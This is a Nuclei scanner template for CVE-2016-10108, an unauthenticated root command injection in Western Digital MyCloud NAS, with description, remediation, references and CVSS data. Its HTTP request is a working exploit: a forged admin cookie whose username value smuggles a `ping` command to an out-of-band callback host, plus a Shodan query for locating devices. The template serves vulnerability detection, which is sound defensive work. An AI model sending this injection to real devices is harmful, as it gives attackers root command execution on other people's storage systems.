nuclei-templates/http/cves/2016/CVE-2016-10108.yaml

45 lines
1.7 KiB
YAML
Raw Normal View History

2023-08-28 23:42:23 +00:00
id: CVE-2016-10108
info:
name: Western Digital MyCloud NAS - Command Injection
author: DhiyaneshDk
severity: critical
description: |
Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
2023-08-28 23:42:23 +00:00
reference:
- https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
- https://nvd.nist.gov/vuln/detail/CVE-2016-10108
- https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
2023-08-28 23:42:23 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-10108
cwe-id: CWE-77
2023-08-31 11:46:18 +00:00
epss-score: 0.84853
epss-percentile: 0.9813
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
2023-08-28 23:42:23 +00:00
metadata:
max-request: 1
vendor: western_digital
product: mycloud_nas
2023-09-06 13:22:34 +00:00
shodan-query: http.favicon.hash:-1074357885
2023-08-31 11:46:18 +00:00
tags: packetstorm,cve,cve2016,rce,oast,wdcloud
2023-08-28 23:42:23 +00:00
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1
matchers:
- type: dsl
dsl:
- contains(body, "WDMyCloud")
- contains(interactsh_protocol, "dns")
- status_code == 200
condition: and